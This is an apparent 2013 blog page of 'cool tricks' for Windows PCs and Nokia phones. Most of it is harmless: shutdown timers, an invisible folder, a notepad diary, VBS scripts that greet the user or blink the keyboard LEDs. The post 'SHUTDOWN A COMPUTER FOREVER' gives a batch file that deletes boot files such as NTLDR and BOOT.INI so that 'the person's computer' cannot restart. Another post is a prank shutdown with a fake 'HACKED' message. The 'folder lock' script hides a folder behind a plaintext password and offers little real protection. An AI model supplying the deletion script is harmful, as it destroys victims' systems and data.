Saturday, 30 March 2013
Galaxyyliga: TRU HD wallpapers Galaxyy
Galaxyyliga: TRU HD wallpapers Galaxyy: Hi Every one ! Want Some cool HD wallpapers for your galaxyy ? Presenting you the awesome HD wallpapers pack by nightwing90 from xda-dev...
Galaxyyliga: HOW TO (ROOT) GalaxyY
Galaxyyliga: HOW TO (ROOT) GalaxyY: Hey Guys ! As this is is My first Post ! i am Going to teach you how to root your Samsung Galaxyy GT-S5360. -----------------------------...
How to remove the underline from hyperlink
Guys ever seen a hyperlink which is not underlined. Whether you have seen or not seen this is how it is done.
1. The HTML code for a hyperlink is
<A href = "http://www.hackamia.blogspot.in/">
2. To remove the underline just add style="text-decoration:none"
i.e the HTML code will become
<A href ="http://www.hackamia.blogspot.in/" style="text-decoration:none">
1. The HTML code for a hyperlink is
<A href = "http://www.hackamia.blogspot.in/">
2. To remove the underline just add style="text-decoration:none"
i.e the HTML code will become
<A href ="http://www.hackamia.blogspot.in/" style="text-decoration:none">
Wednesday, 27 March 2013
Google Your IP!!
This is a cool feature of Google by which you can know your IP.
1. Open Google. https://www.google/com/
2. In the search box type "What is my ip?" (without "")
3. Press enter and google will show you your IP.
1. Open Google. https://www.google/com/
2. In the search box type "What is my ip?" (without "")
3. Press enter and google will show you your IP.
Nokia Mobile Codes
These are are a few cool secret codes for a Nokia mobile.
*#06# For checking the IMEI (International Mobile Equipment Identity).
*#7780# Reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# Display the MAC address of the WLAN adapter. This is available
only in the newer devices that supports WLAN
*#92702689# Shows your warranty card
Saturday, 9 March 2013
The 9/11 Trick
This is an old but very famous and interesting trick. This trick is known as 9/11 trick. The flight number of the plane that crashed into the towers is Q33NY
1. Open notepad.
2. Go to the font option in the format tab.
3. Change the font to wingdings and font size to 72.
4. Now exit and type Q33N as it is and see the coincidence (That is what I would call it!!).
How to shutdown your computer after giving a message
This is in continuation with the previous post.
1. You can type shutdown /s /t 300 /c "Your computer has been HACKED!!!"
2. This will shutdown the computer after 5 minutes giving the above message.
3. You can terminate this command by typing shutdown /a
1. You can type shutdown /s /t 300 /c "Your computer has been HACKED!!!"
2. This will shutdown the computer after 5 minutes giving the above message.
3. You can terminate this command by typing shutdown /a
Friday, 8 March 2013
Time Bomb!!!!!!
This post is in continuation to a the post "how to shutdown your computer using cmd"
1. Open CMD window.
2. Type shutdown /s /t 300
3. This will shutdown your computer after 300 seconds i.e. 5 minutes.
4. You can type /r instead of /s to restart your computer after 5 minutes.
This will not work with the /l tag.
1. Open CMD window.
2. Type shutdown /s /t 300
3. This will shutdown your computer after 300 seconds i.e. 5 minutes.
4. You can type /r instead of /s to restart your computer after 5 minutes.
This will not work with the /l tag.
Thursday, 7 March 2013
Tuesday, 5 March 2013
Create an Invisible Folder
1.
Create a new folder.
2.Right
click and go to properties.
3.In
the name box type 255 while pressing and holding left Alt button.
4.Exit
the properties menu. You will have created a nameless folder.
5.
Now again go to properties and go to the Customize tab.
6.
Click on change icon and select an invisible icon.
7.Exit the menu. You have created a invisible folder.
Create A Diary Using Notepad
1. Go to notepad
and type .LOG.
2. Save it as
Diary.LOG (.LOG) is must.
3. Exit notepad
and open the file you have saved.
4. You will see
something like below.
6. Start typing
your diary and save it.
Every time you
open this diary it will automatically enter the date and time.
HAVE FUN
Sunday, 3 March 2013
Access C Drive Using CMD
This is a basic way to access your C drive (you can access anything but this is just for beginning)
- Go to start menu and open 'Run'.
- Type cmd.
- A window, like above, will open.
- Type cd.. and press enter.
- Again repeat the steps.
- Now you will only have C::\ left.
- Now type dir after this.
- It will show a list off all the data on your drive.
Shutdown Computer Using CMD
1. Go to 'run' and type 'cmd' (without inverted commas)
2. Type shutdown/s and press enter.
3. If you want to log off type shutdown/l and press enter.
4. and if you want to restart type shutdown/r.
5. For more details type shutdown/? and press enter in CMD window.
Make Your Computer Greet You When It Starts
You all must have seen in sci-fi movies how a computer greets it's owner. Well, this is the same thing.
Follow these steps and you can make your computer greet you when it starts.
1. Click on Start. Navigate to All Programs, Accessories and Notepad.
2. Copy and paste the exact code given below.
Dim speaks, speech
speaks="Welcome to your computer"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3. Replace Username with Name.
4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs
5. Copy the saved file.
6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder
7. Paste the file.
Now restart your computer and see how your computer greets you.
Lock A Folder Without Any Software
• Open the folder, right-click on a blank area in it, then select New -> Text Document from the pop-up menu.
• Open the text file you just created by double-clicking it and copy/paste in the following text:
cls
@ECHO OFF
title Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
• In the above code, replace the key PASS with the password you want to use to unlock the folder. For example if you want the password to be 111, the line should look like:
if NOT %pass%== 111 goto FAIL
• Save your new file in the .bat format with the complete file name being locker.bat. To do this, make sure to change the Save as type: to All Files
• In the folder you created back in Step #1, double click the locker.bat file and there will now be a new folder named Private where you can put anything you want.
• Upon exiting, double click the locker.bat file again. It will prompt you to answer whether you want to lock your folder or not. Press Y and the private folder will disappear.
• In order to retrieve the Private folder, all you have to do is double click the locker.bat file and enter the password which you set in Step #4 and the folder will appear again for you to access.
Saturday, 2 March 2013
SHUTDOWN A COMPUTER FOREVER!!!!
Go and type the following code in notepad
@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
THIS WILL SHUT DOWN THE PERSON’S COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO REBOOT AND RESTART.
REMEMBER – DO NOT OPEN THE FILE.
YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
Turn Your Keyboard Into A Disco
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as dance.vbs (name can be anything but .vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.
3. Open your save file and see your keyboard led blinking like disco lights.
Subscribe to:
Posts (Atom)